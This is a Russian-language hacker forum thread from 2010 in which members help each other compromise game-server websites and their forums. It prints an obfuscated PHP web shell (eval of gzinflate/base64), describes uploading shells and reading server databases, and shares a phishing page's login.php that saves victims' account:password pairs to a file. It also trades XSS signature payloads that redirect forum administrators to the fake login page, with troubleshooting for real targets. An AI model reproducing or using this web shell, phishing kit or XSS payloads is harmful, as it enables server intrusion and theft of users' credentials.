preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOE 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
(Я всё копипаст не стал, там такая ****ь "9JEsQGoV9G7dx" еще 2 - 3 Строчки. Почему не могу зайти в предведущю директорию?
Решил переделать. Добавил Новый формат: .phtml
Захожу на av-69.phtml - ввожу root
Зашёл в /home/l/.../public_html/inc/data/
Но тама есть толькоdle_admin_sections
dle_banned
dle_banners
dle_category
dle_comments
dle_email
dle_files
dle_flood
dle_images
dle_logs
dle_lostdb
dle_notice
dle_pm
dle_poll
dle_poll_log
dle_post
dle_post_log
dle_rss
dle_rssinform
dle_static
dle_static_files
dle_subscribe
dle_tags
dle_usergroups
dle_users
dle_views
dle_vote
dle_vote_result
stress_admin
stress_news
stress_poll
stress_poll_logs
stress_static
stress_users_tmp .
accounts - нету((
Chipito
11.06.2010, 19:38
Загрузил шелл захожу по нему: Ответ:
<?php # Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOE 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
(Я всё копипаст не стал, там такая ****ь "9JEsQGoV9G7dx" еще 2 - 3 Строчки. Почему не могу зайти в предведущю директорию?
Решил переделать. Добавил Новый формат: .phtml
Захожу на av-69.phtml - ввожу root
Зашёл в /home/l/.../public_html/inc/data/
Но тама есть только.
accounts - нету((
Зашел не в ту базу,конфиги смотри в config_game_l2db.php
(названия точно не помню)
и прказывает----> '> и на фейк не кидает.Что не так?
m0nk
12.06.2010, 14:11
1) либо куки чисть
2) либо забей и отправляй админу
3) либо если хочешь проверить качай браузер opera 9 и т.п.
Rjay
13.06.2010, 13:30
не пойму.надо заливать 3 файла на хостинг или 1 или архивом?и куда ссылку на них кидать?
zDebeF
13.06.2010, 13:37
если даже не знаешь как и куда заливать - забудь лучше вообще.
Заливать 3 файла, переход на главную страницу [xxx.ru/ ; xxx.ru/index.php]
Rjay
13.06.2010, 13:39
все равно не понял.если можно поподробней.вот есть 3 файла.залил по 1ому на хостинг,дальше что делать?
Fix
13.06.2010, 13:54
все равно не понял.если можно поподробней.вот есть 3 файла.залил по 1ому на хостинг,дальше что делать?
Читать первый пост.
BuSh1Do
13.06.2010, 14:02
[color="#FFFFFF"][Ссылки могут видеть только зарегистрированные и активированные пользователи]я олень/[/B]\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym]
вставляю в подпись, а ссылку на фейк изменяет...это защита такая? ".com" изменяет на "я олень" =)
Rjay
13.06.2010, 14:20
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?
BuSh1Do
13.06.2010, 14:25
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?
вставляешь сюда вместо [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Если чесн, советую вам заменять в подписи эти символы какой-то картинкой или например текстом раздаю 6-тизнаки, так не палиться
Me$$iah
26.06.2010, 05:52
Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?
TakeThat
26.06.2010, 16:24
Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?
через че конектишься навикат чтоли? лутше конектся через шелл т.к от навиката пользы 0
object
27.06.2010, 17:31
Для самых ленивых , и не понятливых .
Снял видео . как залить шелл . С инструкцией (C) m0nk.
Как вы поняли из видео , тест был на severe-world.
Качаем (дамп) ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
F4ll3nL0rD
28.06.2010, 19:44
Дошел до стадии, когда нужно залить фейк на хостинг, успешно залил, получился фейк, но при вводе каких-нибудь данных вида акк:пасс, у меня не перебрасывает с фейка на оригинальную страницу авторизации, хотя при этом в блокноте создается запись акк:пасс, которую я вводил. В чем может быть проблема?
Содержимое файла login.php
<?php
/*
Фейк был создан при помощи генератора ArxWFakeGen.
Автор программы ArxWolf.
Официальный сайт программы и новых версий [Ссылки могут видеть только зарегистрированные и активированные пользователи]
*/
$BASE="game.txt";
$IS_EMAIL=false;
$LOCATION="[Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт_сервера/forum/";
if ($IS_EMAIL){
mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
$LOCATION="[Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт_сервера/forum/";
Вот тут попробуй выставить [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт_сервера/forum/index.php
Еще возможно ты не регистрировался на форуме, а там запрещено просматривать форум, если ты не зарегистрировался и поэтому тебя перебрасывает на страничку авторизации.
IncubusX
28.06.2010, 19:46
Всё равно когда ты заходишь [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт_сервера/forum/ то ты заходишь на [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт_сервера/forum/index.php по умолчанию. И только потом тебя переадресовывает куда нибудь.
L0stHorror
28.06.2010, 20:05
F4ll3nL0rD, спасибо! Ошибка заключалась именно в этом.
IncubusX, на том форуме обязательна прибавка index.php, без него форум просто не откроется, т.е. вид [Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт_сервера/forum не открывается, и с него не переадресовывает.
Добавлено через 24 минуты
Теперь уже вопрос по самому xss:
]текст_подписи[/acronym]
Где тут ошибка?
x3Cifr*ame в коде есесно без *
Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?
А, вот, все работает, код нормальный) Просто нужно было подождать, пока в game.txt запишется акк:пасс.
Пошел работать дальше :)
TakeThat
28.06.2010, 20:57
Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?
Да он должен прочитать ваше сообщения плюс он должен попасть курсором по вашему фейку и тогда его перекинет на ваш фейк и если он тупой то он введет свои данные.
L0stHorror
28.06.2010, 23:05
Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?
Добавил:
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
F4ll3nL0rD
28.06.2010, 23:27
Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?
Добавил:
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
1. Да именно браузер жертвы.Можно вставить сколько хочешь xss.
2.Если в браузере выставлено удалять кукисы через определенное кол-во дней или после завершения сеанса, то они удаляются.
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
Просто удали кукисы и можешь попробовать.
<Infin1ty>
06.07.2010, 14:49
Кому нужны сайты хостингов прошу : [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Восстание
09.07.2010, 07:43
Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код:
x3Cifr*ame[/COLOR]\x20src=ССЫЛКА НА МОЙ ФЕЙК\x20frameborder=0\x20width=100%\x20height=100% \x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]__________________________________________________ __________________________[/acronym]
x3Cifr*ame естественно без *
Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные и активированные пользователи]
necros555
09.07.2010, 10:37
Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код:
x3Cifr*ame естественно без *
Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные и активированные пользователи]
то что это для ipb а не для булки вот че ты неправильно делаеш
wagan
10.07.2010, 02:51
А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.
оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные и активированные пользователи] (переадресовывало и до того как я добавил еще два варианта кода ниже)
BlackWinG
10.07.2010, 02:54
А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.
оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные и активированные пользователи] (переадресовывало и до того как я добавил еще два варианта кода ниже)
Да, если в подписи ты видиш свой код, значит там точно не получиться....
Сказано ведь, забудь, там работать не будет просто, только палишся...
IncubusX
10.07.2010, 09:00
Его сообщении в мазиле переадресовывает только при наведении.
Восстание
10.07.2010, 14:26
Переадресовывает но валиво. Закрась это в белый цвет)
По моему на "булках" тоже как то можно так делать, только я непомню код, но он там простой.
wagan
10.07.2010, 17:18
_]Мышку не наводить, выбьет с форума))_[/acronym]
Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.
fesssi
10.07.2010, 17:50
Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.
F4ll3nL0rD
10.07.2010, 18:07
_]Мышку не наводить, выбьет с форума))_[/acronym]
Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.
Ты в скрипте посмотри куда стоит редирект.
Если так:
